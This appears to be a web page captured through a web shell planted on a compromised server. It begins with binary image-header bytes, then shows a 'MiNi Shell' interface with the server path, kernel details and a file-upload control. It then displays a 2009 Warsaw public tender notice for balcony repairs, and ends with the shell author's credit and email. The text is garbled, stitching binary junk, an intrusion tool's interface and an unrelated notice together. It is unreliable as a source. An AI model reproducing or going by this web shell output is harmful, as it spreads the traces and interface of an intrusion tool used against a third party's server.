JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /proc/self/root/home/vmanager/www/common/web/tenders/20090515/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //proc/self/root/home/vmanager/www/common/web/tenders/20090515/151720-N-2009.html

<p class="kh_header"><b>Warszawa: Remont balkonów w budynkach administrowanych przez ZGN Praga Południe</b><br>
<b>Numer ogłoszenia: 151720 - 2009; data zamieszczenia: 15.05.2009</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Zakład Gospodarowania Nieruchomościami w Dzielnicy Praga Południe m.st. Warszawy , ul. Walewska 4/21, 04-022 Warszawa, woj. mazowieckie, tel. 022 517 74 36, faks 022 517 74 22.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.zgnpragapld.com.pl/przetarg.php</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Remont balkonów w budynkach administrowanych przez ZGN Praga Południe.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest remont balkonów w budynkach:
w części 1 - ul. Zamoyskiego 43 - 16 szt.; ul. Targowa 5 - 9 szt.; ul. Frycza Modrzewskiego 23 - 12 szt.;
w części 2 - ul. Skaryszewska 11 - 20 szt.; ul. Skaryszewska 13 - 21 szt.;
w części 3 - ul. Rybna 24 - 4 szt.; ul. Rybna 26 - 4 szt.; ul. Mińska 20 - 6 szt.; ul. Głucha 3 - 4 szt.; ul. Głucha 3A - 4 szt.; ul. Chodakowska 14 - 2 szt., zgodnie z dokumentacją techniczną..</p>
<p><b>II.1.4) Wspólny Słownik Zamówień (CPV):</b> 45.26.29.00-0.</p>
<p><b>II.1.5) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 3.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.1.7) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p><p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w dniach: 90.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WARUNKI DOTYCZĄCE ZAMÓWIENIA</b>
</p><b>Informacja na temat wadium:</b> Wysokość wadium wynosi 15 000,00 zł., w tym dla części 1 - 6000,00 zł, dla części 2 - 5000,00 zł, dla części 3 - 4000,00 zł. Wadium winno być wniesione przed upływem terminu składania ofert, t.j. oferta winna być zabezpieczona wadium przed terminem otwarcia.<br><p><b>III.2) WARUNKI UDZIAŁU</b></p>
<ul class="kh_indent_1"><li><b>Opis warunków udziału w postępowaniu oraz opis sposobu dokonywania oceny spełniania tych warunków:</b> 1. O udzielenie zamówienia mogą ubiegać się wykonawcy, którzy spełniają wymagania
określone w art. 22 ust. 1 ustawy Prawo zamówień publicznych:
   1) Posiadają uprawnienia do wykonywania określonej działalności lub czynności,  jeżeli 
        ustawy nakładają obowiązek posiadania takich uprawnień,
   2) Posiadają niezbędną wiedzę i doświadczenie oraz dysponują potencjałem technicznym 
        i osobami zdolnymi do wy?konania zamówienia lub przedstawią pisemne zobowiązanie 
        innych podmiotów do udostępnienia potencjału technicznego i osób zdolnych do 
        wykonania zamówienia, t.j. :
       a)  Wykażą, że w ciągu 5 lat przed dniem wszczęcia postępowania o udzielenie 
             zamówienia, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, 
             wykonali co najmniej 3 roboty budowlane w zakresie remontu balkonów.
        b)  Wykażą, że dysponują lub będą dysponowali co najmniej 1 osobą posiadającą
            odpowiednie uprawnienia do kierowania robotami budowlanymi bez
            ograniczeń w specjalności konstrukcyjno - budowlanej.
   3) Znajdują się w sytuacji ekonomicznej i finansowej zapewniającej wykonanie 
        zamówienia, tj. - Wykonawca, którego oferta zostanie wybrana, przed podpisaniem
        umowy wykaże, że posiada ubezpieczenie od odpowiedzialności cywilnej (deliktowej i
        kontraktowej) w zakresie prowadzonej działalności zgodnej z przedmiotem zamówienia
        dla części 1 na kwotę nie niższą niż: 400 000,00 zł. na okres trwania umowy, dla części
        2 na kwotę nie niższą niż 300 000,00 zł na okres trwania umowy, dla części 3 na kwotę
        nie niższą niż 250 000,00 zł na okres trwania umowy. Suma ubezpieczenia wzrasta
        odpowiednio wraz z zakresem oferty i dla wszystkich części zamówienia wynosi nie mniej niż 950 000,00 zł.
   4) Nie podlegają wykluczeniu z postępowania o udzielenie zamówienia.
            2. W przypadku wspólnego ubiegania się o zamówienie Wykonawcy muszą wykonać czynności o których mowa  w art. 23 ust. 2 ustawy Prawo zamówień publicznych, przy czym każdy z Wykonawców musi spełniać warunek określony w pkt 1.ppkt 4) niniejszych warunków udziału w postępowaniu, pozostałe warunki określone w pkt 1.ppkt 1),2),3) mogą spełniać łącznie..</li>
<li><b>Informacja o oświadczeniach i dokumentach, jakie mają dostarczyć wykonawcy w celu potwierdzenia spełniania warunków udziału w postępowaniu:</b> 1. Upoważnienie/pełnomocnictwo do występowania w imieniu Wykonawcy (jeżeli dotyczy).
2. Oświadczenie o spełnianiu warunków określonych w art. 22 ust. 1 ustawy Prawo
zamówień publicznych (wg wzoru stanowiącego załącznik nr 1 do wniosku).
3. Oświadczenie o niepodleganiu wyłączeniu z postępowania o udzielenie
zamówienia publicznego (wg wzoru stanowiącego załącznik nr 2 do wniosku).
4. Wykaz zrealizowanych robót budowlanych w zakresie remontu balkonów w okresie ostatnich 5 lat przed dniem wszczęcia postępowania o udzielenie zamówienia (wg wzoru stanowiącego załącznik nr 3 do wniosku) a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, odpowiadających swoim rodzajem pracom stanowiącym przedmiot zamówienia, zawierający minimum 3 roboty budowlane oraz dodatkowo co najmniej 3 dokumenty (np. referencje) potwierdzające, że umieszczone w wykazie prace zostały wykonane należycie. Wykonawca dostarczy potwierdzenie należytego wykonania tych robót wystawione przez klienta (dołączone dokumenty powinny dotyczyć pozycji w wykazie). Zamawiający przyzna Wykonawcy 1 punkt za 3 prawidłowe dokumenty oraz po dodatkowym punkcie za każdy następny prawidłowy dokument.
5.	Aktualny odpis z właściwego rejestru albo aktualne zaświadczenie o wpisie do
ewidencji działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do
rejestru lub zgłoszenia do ewidencji działalności gospodarczej. Data wystawienia
zaświadczenia - nie więcej niż 6 miesięcy przed terminem wyznaczonym do
składania wniosków o dopuszczenie do udziału w postępowaniu.
6. W celu realizacji prac budowlanych wykonawca musi dysponować co najmniej jedną
osobą posiadającą uprawnienia do kierowania robotami budowlanymi bez ograniczeń w
specjalności konstrukcyjno - budowlanej.
Na potwierdzenie spełniania warunku żądamy kopii powyższych uprawnień
poświadczonych za zgodność z oryginałem. W przypadku gdy wykonawca wskazał
osobę, którą będzie dysponował, dołączy również pisemne zobowiązania podmiotów
do udostępnienia tej osoby do wykonania zamówienia.
7. Aktualne wpisy na listę członków właściwej Izby Inżynierów Budownictwa osób
posiadających powyższe uprawnienia potwierdzone przez tę Izbę.
8. Zaświadczenie z właściwego oddziału ZUS-u lub Kasy Rolniczego
Ubezpieczenia Społecznego o nie zaleganiu ze składkami na ubezpieczenie
zdrowotne i społeczne, lub zaświadczenie, że wykonawca uzyskał przewidziane
prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub
wstrzymanie w całości wykonania decyzji właściwego organu. Data wystawienia
zaświadczenia - nie więcej niż 3 miesiące przed terminem wyznaczonym do
składania wniosków o dopuszczenie do udziału w postępowaniu.
9. Zaświadczenie właściwego naczelnika Urzędu Skarbowego potwierdzającego,
że wykonawca nie zalega z opłacaniem podatków lub zaświadczenie, że
wykonawca uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie
na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji
właściwego organu. Data wystawienia zaświadczenia - nie więcej niż 3 miesiące
przed terminem wyznaczonym do składania wniosków o dopuszczenie do udziału w postępowaniu.
10. Wykonawca, którego oferta zostanie wybrana, przed podpisaniem umowy wykaże,
że posiada ubezpieczenie od odpowiedzialności cywilnej (deliktowej i kontraktowej) w 
zakresie prowadzonej działalności zgodnej z przedmiotem zamówienia na kwotę nie 
niższą niż 400 000,00 zł na okres trwania umowy dla części 1, na kwotę nie
niższą niż 300 000,00 zł na okres trwania umowy dla części 2 i na kwotę nie
niższą niż 250 000,00 zł na okres trwania umowy dla części 3. Suma
ubezpieczenia wzrasta odpowiednio wraz z zakresem oferty i dla wszystkich
części zamówienia wynosi nie mniej niż 950 000,00 zł.
Ocena spełniania w/w warunków i wymogów dokonana zostanie według następujących zasad:
a) za spełnienie każdego z warunków, oprócz dokumentów potwierdzających należyte wykonanie prac umieszczonych w wykazie stanowiącym załącznik nr 3 do wniosku o dopuszczenie do udziału w postępowaniu, przyznawany będzie 1 pkt.;
b) za przedłożenie trzech dokumentów potwierdzających należyte wykonanie prac umieszczonych w wykazie stanowiącym załącznik nr 3 do wniosku o dopuszczenie do udziału w postępowaniu przyznany będzie 1 punkt oraz za każdy kolejny dokument ponad wymienione trzy, będzie przyznawany kolejny punkt.
Do przetargu zostaną zakwalifikowani ci spośród wykonawców spełniających warunki udziału w postępowaniu, których wnioski zostaną ocenione najwyżej. Do tych wykonawców zostaną wysłane zaproszenia do złożenia oferty. Wraz z zaproszeniami do złożenia ofert Zamawiający przekaże Wykonawcom specyfikację istotnych warunków zamówienia oraz  wskaże termin i miejsce opublikowania ogłoszenia o zamówieniu..</li></ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>

<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg ograniczony.</p>
<p><b>IV.1.2) Przewidywana liczba wykonawców, którzy zostaną zaproszeni do udziału w postępowaniu:</b> 5.</p><br><p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p><p><b>IV.2.2) Wykorzystana będzie aukcja elektroniczna:</b> nie.</p><br><p><b>IV.3) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.3.1)</b>&nbsp;<b>Adres strony internetowej, na której dostępna jest specyfikacja istotnych warunków zamówienia:</b> www.zgnpragapld.com.pl/przetarg.php.<br><b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Zakład Gospodarowania Nieruchomościami w Dzielnicy Praga Południe m.st.  Warszawy, ul. Walewska 4, 04-022 Warszawa, pok. 21.</p>
<p><b>IV.3.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 26.05.2009 godzina 11:00, miejsce: Zakład Gospodarowania Nieruchomościami w Dzielnicy Praga Południe m.st.  Warszawy, ul. Walewska 4, 04-022 Warszawa, kancelaria pok. nr. 2.</p><p><b>IV.3.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> remont balkonów w budynkach administrowanych przez ZGN Praga Południe zgodnie z dokumentacją techniczną
- ul. Zamoyskiego 43                     - 16 szt.
- ul. Targowa 5                            - 9 szt.
- ul. Frycza Modrzewskiego 23        - 12 szt..</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> remont balkonów w budynkach administrowanych przez ZGN Praga Południe  zgodnie z dokumentacją techniczną,
- ul. Zamoyskiego 43                      - 16 szt.
- ul. Targowa 5                             - 9 szt.
- ul. Frycza Modrzewskiego 23         - 12 szt..</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 45.26.29.00-0.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 90.</li>
<li><b>4) Kryteria oceny ofert:</b>najniższa cena.</p></ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> remont balkonów w budynkach administrowanych przez ZGN Praga Południe zgodnie z dokumentacją techniczną,
- ul. Skaryszewska 11       - 20 szt.
-  ul. Skaryszewska 13      - 21 szt..</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> remont balkonów w budynkach administrowanych przez ZGN Praga Południe zgodnie z dokumentacją techniczną,
- ul. Skaryszewska 11      - 20 szt.               
-  ul. Skaryszewska 13     - 21 szt..</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 45.26.29.00-0.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 90.</li>
<li><b>4) Kryteria oceny ofert:</b>najniższa cena.</p></ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> remont balkonów w budynkach administrowanych przez ZGN Praga Południe zgodnie z dokumentacją techniczną,
- ul. Rybna 24            - 4 szt.                
- ul. Rybna 26            - 4 szt.                 
- ul. Mińska 20           - 6 szt. 
- ul. Głucha 3            - 4 szt.
- ul. Głucha 3A          - 4 szt.
- ul. Chodakowska 14 - 2 szt..</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> remont balkonów w budynkach administrowanych przez ZGN Praga Południe zgodnie z dokumentacją techniczną,
- ul. Rybna 24            - 4 szt.                
- ul. Rybna 26            - 4 szt.                 
- ul. Mińska 20           - 6 szt. 
- ul. Głucha 3            - 4 szt.
- ul. Głucha 3A          - 4 szt.
- ul. Chodakowska 14 - 2 szt..</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 45.26.29.00-0.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 90.</li>
<li><b>4) Kryteria oceny ofert:</b>najniższa cena.</p></ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com